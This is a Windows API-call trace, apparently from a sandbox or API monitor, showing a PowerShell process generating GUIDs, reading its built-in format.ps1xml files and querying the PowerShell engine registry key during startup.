	[0837.816] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xc51d481, Data2=0x46b6, Data3=0x40bc, Data4=([0]=0x8b, [1]=0x1a, [2]=0xfc, [3]=0x9b, [4]=0xea, [5]=0xa9, [6]=0x90, [7]=0x9e))) returned 0x0
	[0837.816] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x389b3622, Data2=0xbeba, Data3=0x4be1, Data4=([0]=0xa7, [1]=0xd, [2]=0x7a, [3]=0x76, [4]=0x17, [5]=0xe, [6]=0x83, [7]=0x3a))) returned 0x0
	[0837.817] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x2aeb6310, Data2=0x1fba, Data3=0x478a, Data4=([0]=0xaf, [1]=0x81, [2]=0x68, [3]=0x9e, [4]=0xdf, [5]=0xd4, [6]=0xca, [7]=0xac))) returned 0x0
	[0837.817] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xce0f717f, Data2=0x83e5, Data3=0x44fb, Data4=([0]=0xa3, [1]=0x6f, [2]=0x7d, [3]=0xda, [4]=0xfd, [5]=0x3c, [6]=0xe6, [7]=0x28))) returned 0x0
	[0837.817] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x2a1c653f, Data2=0x1152, Data3=0x4258, Data4=([0]=0x86, [1]=0x43, [2]=0x59, [3]=0xea, [4]=0x55, [5]=0x69, [6]=0x48, [7]=0x8b))) returned 0x0
	[0837.821] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x1889e1d7, Data2=0x3b57, Data3=0x46e1, Data4=([0]=0x85, [1]=0x98, [2]=0x43, [3]=0x98, [4]=0x17, [5]=0xd0, [6]=0xfe, [7]=0x49))) returned 0x0
	[0837.822] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0837.822] GetFileType (hFile=0x2f4) returned 0x1
	[0837.822] SetErrorMode (uMode=0x1) returned 0x1
	[0837.822] GetFileType (hFile=0x2f4) returned 0x1
	[0837.822] ReadFile (in: hFile=0x2f4, lpBuffer=0x3600648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3600648*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.691] ReadFile (in: hFile=0x2f4, lpBuffer=0x3600648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3600648*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.692] ReadFile (in: hFile=0x2f4, lpBuffer=0x3600648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3600648*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.693] ReadFile (in: hFile=0x2f4, lpBuffer=0x3600648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3600648*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.694] ReadFile (in: hFile=0x2f4, lpBuffer=0x3600648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3600648*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.694] ReadFile (in: hFile=0x2f4, lpBuffer=0x3600648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3600648*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.695] ReadFile (in: hFile=0x2f4, lpBuffer=0x3600648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3600648*, lpNumberOfBytesRead=0x22d378*=0x119, lpOverlapped=0x0) returned 1
	[0839.695] ReadFile (in: hFile=0x2f4, lpBuffer=0x3600648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x3600648*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0839.695] CloseHandle (hObject=0x2f4) returned 1
	[0839.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0839.695] SetErrorMode (uMode=0x1) returned 0x1
	[0839.695] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d320 | out: lpFileInformation=0x22d320*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0839.695] SetErrorMode (uMode=0x1) returned 0x1
	[0839.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0839.705] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d408 | out: phkResult=0x22d408*=0x2f4) returned 0x0
	[0839.706] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d38c, lpData=0x0, lpcbData=0x22d388*=0x0 | out: lpType=0x22d38c*=0x1, lpData=0x0, lpcbData=0x22d388*=0x56) returned 0x0
	[0839.706] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e8310
	[0839.706] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d35c, lpData=0x1b9e8310, lpcbData=0x22d358*=0x56 | out: lpType=0x22d35c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d358*=0x56) returned 0x0
	[0839.706] CoTaskMemFree (pv=0x1b9e8310) 
	[0839.706] RegCloseKey (hKey=0x2f4) returned 0x0
	[0839.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0839.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0839.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.707] VirtualQuery (in: lpAddress=0x22bea0, lpBuffer=0x22cd60, dwLength=0x30 | out: lpBuffer=0x22cd60*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0839.709] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x6e659a56, Data2=0xc26e, Data3=0x4951, Data4=([0]=0x8b, [1]=0x96, [2]=0xc5, [3]=0x2f, [4]=0xb, [5]=0xb6, [6]=0xc4, [7]=0x21))) returned 0x0
	[0839.709] VirtualQuery (in: lpAddress=0x22bfe0, lpBuffer=0x22cea0, dwLength=0x30 | out: lpBuffer=0x22cea0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0839.712] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xb11abdbe, Data2=0x3ba7, Data3=0x4d4b, Data4=([0]=0x81, [1]=0x71, [2]=0x14, [3]=0xe8, [4]=0x30, [5]=0xf0, [6]=0x5e, [7]=0x91))) returned 0x0
	[0839.713] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xed77dd0d, Data2=0x4346, Data3=0x4c0d, Data4=([0]=0xb4, [1]=0x11, [2]=0x9a, [3]=0x59, [4]=0x87, [5]=0x43, [6]=0x24, [7]=0xac))) returned 0x0
	[0839.714] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xc242cb69, Data2=0x2d43, Data3=0x412e, Data4=([0]=0xa2, [1]=0x7d, [2]=0x3d, [3]=0x21, [4]=0xbb, [5]=0x67, [6]=0x66, [7]=0x0))) returned 0x0
	[0839.714] VirtualQuery (in: lpAddress=0x22bfe0, lpBuffer=0x22cea0, dwLength=0x30 | out: lpBuffer=0x22cea0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0839.715] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0839.715] GetFileType (hFile=0x2f4) returned 0x1
	[0839.715] SetErrorMode (uMode=0x1) returned 0x1
	[0839.715] GetFileType (hFile=0x2f4) returned 0x1
	[0839.715] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.716] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.716] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.716] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.716] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.717] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.717] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.717] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.719] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.719] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.720] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.720] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.720] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.721] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.721] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.722] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.725] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.725] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.726] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.726] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.726] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.727] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0839.727] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.128] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.129] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.129] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.129] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.130] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.130] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.130] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.131] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.131] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.137] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.138] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.138] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.138] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.139] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.139] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.139] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.140] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.140] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.140] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.141] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.141] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.142] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.142] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.142] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.143] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.143] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.144] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.144] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.144] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.145] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.145] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.145] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.146] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.146] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0841.146] ReadFile (in: hFile=0x2f4, lpBuffer=0x34a21e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34a21e0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
